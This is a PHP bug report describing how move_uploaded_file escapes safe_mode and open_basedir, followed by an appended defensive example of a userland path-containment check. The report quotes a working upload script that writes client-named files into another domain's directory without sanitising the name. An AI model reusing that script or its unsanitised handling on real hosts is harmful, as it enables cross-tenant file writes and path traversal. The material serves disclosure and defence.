From:             [EMAIL PROTECTED]
Operating system: Linux 2.4.13
PHP version:      4.1.2
PHP Bug Type:     *General Issues
Bug description:  move_uploaded_file breaks safe_mode and open_basedir restrictions

One of my customers has found a way to break my safe_mode and open_basedir
restrictions. (www.net-force.nl)

He created the following script:
<?

$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];

$size_limit = "100000"; // set size limit in bytes

if ($file) {
    if ($size < $size_limit) {
        move_uploaded_file($temp,
            "/domains/killanet.org/public_html/www/test/".$file);
        echo "The file <tt>$file</tt> was successfully uploaded";
    } else {
        echo "Sorry, your file exceeds the size limit of $size_limit bytes";
    }
}

echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>

As you can see, he moved the uploaded file to:
"/domains/killanet.org/public_html/www/test/"

Which should be impossible, because my httpd.conf says:

<VirtualHost 213.206.77.232>
        DocumentRoot /domains/net-force.nl/public_html/root/
        ServerName root.net-force.nl
        CustomLog /domains/net-force.nl/logs/access_log combined
        ErrorLog /domains/net-force.nl/logs/error_log
        php_admin_value safe_mode 1
        php_admin_value open_basedir /domains/net-force.nl/public_html/root/
</VirtualHost>

As you can see, I have set both safe_mode and the open_basedir restriction,
but this user is able to upload any file to any location where the Apache
user has write access.

Credits fly out to [EMAIL PROTECTED] for finding this bug. 
-- 
Edit bug report at http://bugs.php.net/?id=16128&edit=1
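A defensive counterpart to the script in the report, added here as an example and not code from the bug report or from PHP itself: a userland containment check that an upload handler can apply on its own, so that the destination of move_uploaded_file() is verified against the site's own directory regardless of whether the engine's open_basedir check covers that call. The UPLOAD_BASE directory, the size limit and the form field name are assumptions chosen to match the report; $_FILES is used in place of $HTTP_POST_FILES.

```php
<?php
// Added example, not code from the bug report: enforce in userland the same
// containment that open_basedir is meant to provide, so a handler cannot
// write an upload outside its own tree even where the engine-level check
// does not apply. UPLOAD_BASE is an assumed directory for illustration.

define('UPLOAD_BASE', '/domains/net-force.nl/public_html/root/uploads');
define('SIZE_LIMIT', 100000); // bytes, the same limit the reported script used

/**
 * Canonicalise $candidate and return it only if it resolves to a file inside
 * $base (directly or in a subdirectory). Returns false when the directory does
 * not exist, when ".." or a symlink leads outside $base, or when the path
 * contains a NUL byte. The file itself need not exist yet, so only its
 * directory is resolved with realpath().
 */
function path_within_base($base, $candidate)
{
    if (strpos($candidate, "\0") !== false) {
        return false;
    }
    $realBase = realpath($base);
    $realDir  = realpath(dirname($candidate));
    if ($realBase === false || $realDir === false) {
        return false;
    }
    $realBase = rtrim($realBase, DIRECTORY_SEPARATOR);
    $prefix   = $realBase . DIRECTORY_SEPARATOR;
    // Accept only $base itself or a path that begins with "$base/".
    if ($realDir !== $realBase && strncmp($realDir, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $realDir . DIRECTORY_SEPARATOR . basename($candidate);
}

/**
 * Validate one uploaded file and store it under $base. Returns the stored
 * path on success or a string starting with "error:" otherwise.
 * is_uploaded_file() ensures only a genuine upload is moved.
 */
function store_upload($field, $base, $sizeLimit)
{
    if (!isset($_FILES[$field]) || !is_uploaded_file($_FILES[$field]['tmp_name'])) {
        return 'error: no file uploaded';
    }
    if ($_FILES[$field]['size'] > $sizeLimit) {
        return 'error: file exceeds ' . $sizeLimit . ' bytes';
    }
    // basename() strips any directory part the client put in the name
    // (an absolute path or "../"); the containment check below catches
    // anything that still resolves outside $base.
    $name = basename($_FILES[$field]['name']);
    if ($name === '' || $name === '.' || $name === '..') {
        return 'error: invalid file name';
    }
    $dest = path_within_base($base, $base . DIRECTORY_SEPARATOR . $name);
    if ($dest === false) {
        return 'error: destination outside the upload directory';
    }
    if (!move_uploaded_file($_FILES[$field]['tmp_name'], $dest)) {
        return 'error: could not store file';
    }
    return $dest;
}

// Exercising the containment check alone from the command line, with
// constructed paths: a file directly under the temp directory is accepted,
// the directory from the report is rejected (outside the base, or absent on
// this machine), and a ".." escape is rejected.
if (PHP_SAPI === 'cli') {
    $tmp = sys_get_temp_dir();
    var_dump(path_within_base($tmp, $tmp . '/ok.txt'));
    var_dump(path_within_base($tmp, '/domains/killanet.org/public_html/www/test/x'));
    var_dump(path_within_base($tmp, $tmp . '/../escape.txt'));
}

// In the web handler: $stored = store_upload('file', UPLOAD_BASE, SIZE_LIMIT);
```

The check resolves the destination's directory with realpath() before comparing it to the base, so a symlink or a ".." segment that escapes the tree is rejected even though the file does not exist yet; comparing against "$base/" rather than "$base" stops a sibling directory such as "/uploads-old" from passing as a prefix match. This is defence in depth for the application, not a substitute for running a PHP release in which move_uploaded_file() honours open_basedir.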